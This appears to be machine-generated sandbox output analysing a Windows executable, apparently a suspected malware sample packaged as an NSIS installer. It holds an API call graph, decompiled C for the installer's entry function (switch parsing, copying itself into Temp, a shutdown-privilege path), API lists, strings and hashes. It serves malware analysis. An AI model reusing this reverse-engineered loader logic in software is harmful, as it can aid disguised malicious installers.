4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                    Executed Functions

                    Function 00403640 Relevance: 84.4, APIs: 34, Strings: 14, Instructions: 450stringfilecomCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                    C-Code - Quality: 78%
                    			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x435000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				E00406668(0x435000, GetCommandLineW());
				_t94 = 0x435000;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				if( *0x435000 == _t233) {
					_t94 = 0x435002;
				}
				_t198 = CharNextW(E00405F64(_t94, 0x435000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(0x435800, _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(0x435000, _t188);
											if(_t218 < 0x435000) {
												L48:
												_t263 = _t218 - 0x435000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x435000) {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x435800;
														if( *0x435800 == 0) {
															E00406668(0x435800, 0x436800);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(0x435800, _t221);
												E00406668(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x435000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}















































                    0x0040364e
                    0x0040364f
                    0x00403656
                    0x00403659
                    0x00403660
                    0x00403663
                    0x00403676
                    0x0040367c
                    0x0040367f
                    0x00403682
                    0x00403690
                    0x00403698
                    0x004036a3
                    0x004036bc
                    0x004036be
                    0x004036c6
                    0x004036c6
                    0x004036d1
                    0x004036d3
                    0x004036d3
                    0x004036e8
                    0x0040370d
                    0x0040371b
                    0x0040371e
                    0x00403725
                    0x0040372c
                    0x0040372c
                    0x00403725
                    0x0040372e
                    0x00403733
                    0x00403734
                    0x00403740
                    0x00403744
                    0x0040374b
                    0x00403759
                    0x0040375e
                    0x00403765
                    0x00403769
                    0x0040376d
                    0x0040376f
                    0x0040376f
                    0x0040376d
                    0x00403776
                    0x0040377d
                    0x00403783
                    0x0040379b
                    0x004037ab
                    0x004037bd
                    0x004037c4
                    0x004037c6
                    0x004037c7
                    0x004037d8
                    0x004037dc
                    0x004037dc
                    0x004037ef
                    0x004037f1
                    0x004038eb
                    0x004038eb
                    0x004038ee
                    0x004038f1
                    0x00000000
                    0x00000000
                    0x004037fb
                    0x004037fc
                    0x004037ff
                    0x00403808
                    0x00403808
                    0x0040380b
                    0x0040380e
                    0x00403811
                    0x00403814
                    0x00403814
                    0x00403814
                    0x00403815
                    0x00403819
                    0x004038d9
                    0x004038e2
                    0x004038e4
                    0x004038e7
                    0x004038ea
                    0x004038ea
                    0x004038ea
                    0x00000000
                    0x0040381f
                    0x00403820
                    0x00403821
                    0x00403825
                    0x0040383f
                    0x00403846
                    0x00403859
                    0x0040385a
                    0x0040386f
                    0x00403874
                    0x00403876
                    0x00403878
                    0x00403894
                    0x0040389b
                    0x004038ae
                    0x004038af
                    0x004038c4
                    0x004038ca
                    0x004038cc
                    0x004038ce
                    0x004038d6
                    0x004038d8
                    0x00000000
                    0x004038d8
                    0x004038d2
                    0x004038d4
                    0x004038f9
                    0x004038fd
                    0x00403906
                    0x0040390b
                    0x00403911
                    0x0040391c
                    0x0040391e
                    0x00403923
                    0x00403925
                    0x0040397d
                    0x00403982
                    0x0040398b
                    0x00403992
                    0x00403995
                    0x00403b6c
                    0x00403b6c
                    0x00403b71
                    0x00403b7a
                    0x00403b97
                    0x00403c0f
                    0x00403c0f
                    0x00403c17
                    0x00403c19
                    0x00403c19
                    0x00403c1f
                    0x00403c1f
                    0x00403bae
                    0x00403bba
                    0x00403bcb
                    0x00403bd2
                    0x00403bd9
                    0x00403bd9
                    0x00403be1
                    0x00403bed
                    0x00403bfb
                    0x00403c06
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403bef
                    0x00403bef
                    0x00403bf0
                    0x00403bf2
                    0x00403bf3
                    0x00403bf4
                    0x00403bf9
                    0x00403c08
                    0x00403c0a
                    0x00000000
                    0x00403c0a
                    0x00000000
                    0x00403bf9
                    0x00403bed
                    0x00403b84
                    0x00403b8b
                    0x00403b8b
                    0x004039a1
                    0x00403a48
                    0x00403a48
                    0x00403a54
                    0x00000000
                    0x00403a54
                    0x004039b2
                    0x004039ba
                    0x00403a0c
                    0x00403a0c
                    0x00403a12
                    0x00403a19
                    0x00403a67
                    0x00403a69
                    0x00403a6e
                    0x00403a70
                    0x00403a78
                    0x00403a78
                    0x00403a83
                    0x00403a8f
                    0x00403a95
                    0x00403a97
                    0x00403b6a
                    0x00403b6a
                    0x00403b6a
                    0x00000000
                    0x00403a9d
                    0x00403a9d
                    0x00403a9f
                    0x00403aa0
                    0x00403aa9
                    0x00403aa2
                    0x00403aa2
                    0x00403aa2
                    0x00403aaf
                    0x00403ab7
                    0x00403abe
                    0x00403ac6
                    0x00403ac6
                    0x00403ad3
                    0x00403adf
                    0x00403ae9
                    0x00403ae9
                    0x00403aeb
                    0x00403af2
                    0x00403afc
                    0x00403b08
                    0x00403b0e
                    0x00403b14
                    0x00403b17
                    0x00403b21
                    0x00403b27
                    0x00403b29
                    0x00403b2d
                    0x00403b3e
                    0x00403b44
                    0x00403b49
                    0x00403b4b
                    0x00403b4e
                    0x00403b54
                    0x00403b54
                    0x00403b4b
                    0x00403b29
                    0x00403b57
                    0x00403b5e
                    0x00403b5e
                    0x00403b5e
                    0x00403b5e
                    0x00403b65
                    0x00000000
                    0x00403b65
                    0x00403a97
                    0x00403a1b
                    0x00403a1e
                    0x00403a22
                    0x00403a27
                    0x00403a29
                    0x00000000
                    0x00000000
                    0x00403a35
                    0x00403a40
                    0x00403a45
                    0x00000000
                    0x00403a45
                    0x004039c3
                    0x004039db
                    0x004039ec
                    0x004039ed
                    0x004039f1
                    0x004039f3
                    0x00403a01
                    0x00403a08
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403a08
                    0x00403a0a
                    0x00000000
                    0x00403a0a
                    0x0040392d
                    0x00403939
                    0x0040393e
                    0x00403943
                    0x00403945
                    0x00000000
                    0x00000000
                    0x0040394d
                    0x00403955
                    0x00403966
                    0x0040396e
                    0x00403970
                    0x00403975
                    0x00403977
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403977
                    0x00000000
                    0x004038d4
                    0x0040387d
                    0x0040387f
                    0x00000000
                    0x00000000
                    0x00403881
                    0x00403885
                    0x00403889
                    0x00403890
                    0x00403890
                    0x00403890
                    0x00403890
                    0x00000000
                    0x00403890
                    0x0040388b
                    0x0040388e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040388e
                    0x00403827
                    0x0040382b
                    0x0040382e
                    0x00403835
                    0x00403835
                    0x00000000
                    0x00403835
                    0x00403830
                    0x00403833
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403833
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403801
                    0x00403801
                    0x00403802
                    0x00403803
                    0x00403803
                    0x00000000
                    0x00403801
                    0x00000000

                    APIs
                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                    • OleInitialize.OLE32(00000000), ref: 0040377D
                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                    • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004037E9
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403A8F
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\PhviZrlpkW.exe,00420F08,00000001), ref: 00403B21
                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                    • ExitProcess.KERNEL32(?), ref: 00403B6C
                    • OleUninitialize.OLE32(?), ref: 00403B71
                    • ExitProcess.KERNEL32 ref: 00403B8B
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                    • ExitProcess.KERNEL32 ref: 00403C1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                    • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PhviZrlpkW.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 2292928366-462549642
                    • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                    • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                    Uniqueness

